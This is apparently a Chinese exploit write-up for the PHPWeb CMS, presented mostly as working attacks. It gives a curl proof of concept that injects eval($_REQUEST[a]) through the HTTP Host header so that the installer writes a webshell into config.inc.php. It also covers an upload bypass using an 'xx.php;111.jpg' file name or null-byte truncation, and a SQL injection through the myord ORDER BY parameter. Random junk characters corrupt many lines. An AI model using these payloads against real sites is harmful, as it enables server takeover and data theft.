phpweb成品网站最新版(注入、上传、写shell)

admin

注入：
% r% ~; u$ d0 ~
# ^1 n2 z: R5 J之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
9 P) a- H2 k& O9 w; R! [/ r
( v, [" G% O3 u* S8 l鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录
/ @9 N" |% l! G8 r
虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响
5 h  w: j9 i9 j8 m2 z5 Z
5 ^/ b! G3 N4 Y分析：


1 Z" I3 H* c% u) H% s& N, b- d$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
$ D6 R8 ~# \; L  s* d) G
                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
- v, k" [5 l; k                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
* C# `9 V3 m3 o" j( s6 b! N3 B/ D                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
' m7 ]4 o0 {7 _2 S                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
+ O" n% h: U0 q$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
7 W' o+ ]0 A8 |; K/ C
poc：

0 ^2 V! `  ?4 z/ y8 t?
1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
- Q1 ?5 T8 T5 K2 ?4 ~0 C9 `' T( Kshell地址: /config.inc.php
0 t, \: X/ P7 N" m! \跟之前的 phpcms一样 需要远程数据库
# f. T8 ]' E; q) H
——————————————————–
上传漏洞(需要进后台)：
# |& w* [7 K  j+ E  r# T% _漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
$ W* t" G; \, ~9 z8 \$ V: p0 y" }

  P7 L9 p/ g! h- e7 h# W  q<?php
8 E9 _' s3 g( h- ?" E# e' X9 m5 ?9 D    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);
' l6 o# v0 l) U( Y8 j0 e
) f5 a3 ]; N$ U9 o6 r    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
" ]% H9 ]1 e8 y7 ~4 C1 w: |  Y- U            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
4 ]# f. I$ E" ^  u4 k: X  S    }

; _# e% x$ K4 u1 r% u    //文件保存目录路径
! {/ D9 X# w! ~5 N- P4 Q+ h% n    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
" ?6 I2 @: U/ A& _: ^    echo $save_path;
! \7 w. x: G# C- e    //文件保存目录URL
3 Q& u, q# T0 F. s" n  J+ g/ j/ r9 @    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

    //最大文件大小
    $max_size = 1000000;

6 \' Q* J& I2 P" ^: l7 o    //更改目录权限
    @mkdir($save_path, 0777);

/ |. W3 n# Y6 V, }8 [$ n    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名
" h1 b/ C  e5 E5 e, D
    //文件URL
    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
    if (empty($_FILES) === false) {
# Y( |# E  F: N
            //原文件名
            $file_name = $_FILES['fileData']['name'];
) s. M+ F; ~7 s0 j            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
! R) I3 ?* O( \            $file_size = $_FILES['fileData']['size'];
            //检查目录
3 ~/ _( b3 j0 M2 Y            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
            }
            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
% b8 b* b) I" `# o: w  J" G0 j            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
! X( I" ~  c+ t- H8 m                    alert("临时文件可能不是上传文件。");
& M; ?( K0 W8 L1 |4 m            }
) i! h: B3 \* g1 P) ]            //检查文件大小
            if ($file_size > $max_size) {
% o3 R( \4 A3 r, r                    alert("上传文件大小超过限制。");
& S- l0 q7 O% _! y: h7 W            }
$ Q5 w7 u/ m' P            //获得文件扩展名
6 U4 K0 Q$ _1 E0 N            $temp_arr = explode(".", $_POST['fileName']);
3 `4 q) A/ Y5 `4 x* g' m            $file_ext = array_pop($temp_arr);
5 G/ @2 e1 W4 V  J8 p            $file_ext = trim($file_ext);
; Z. G. K, n1 B; A8 v8 K. {            $file_ext = strtolower($file_ext);
0 L5 Q* r/ c7 m& _
            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
            }
1 o1 ~) B" Y! |) X) v
            //移动文件   
            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
                    alert("上传文件失败。");
            }
1 ]+ j/ i0 ]( A0 L5 S2 C# P7 ]
            @chmod($file_path,0666);

5 l% r& d/ }- B1 n( _( ~! L    ?>
0 p  d- f  {2 }. V, I  S) `/ O抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

——————————————————
/ z2 Q  U+ P0 o3 W; b% f( w注入漏洞：
漏洞文件:search/module/search.php
& W) ^4 i" {4 g0 i3 c/search/index.php?key=1&myord=1 [sqlinjection]
' Q5 n; q" J! K& D3 `

- ^. h) o7 C3 w/ ^, y<?php
   //       ... 省略 n 行...
) P$ M$ A2 g3 h4 W6 p' l   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
- _: t; v/ I( S! R' s' b. S           $myord=htmlspecialchars($_GET["myord"]);
- `2 v6 C0 n- |/ t/ s; U4 B
   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
% w- g! o& N' T7 Z   //第47行 $key:

   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
% `- V0 p4 `+ G6 g2 J5 y4 s+ s
6 n# a( g5 [2 ^0 z   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
8 M' u2 t% C& v0 N) Q" z
2 r. @! c; U+ v" ]) z' J% I   ?>
" K* A6 A# m% {2 y5 w+ D" T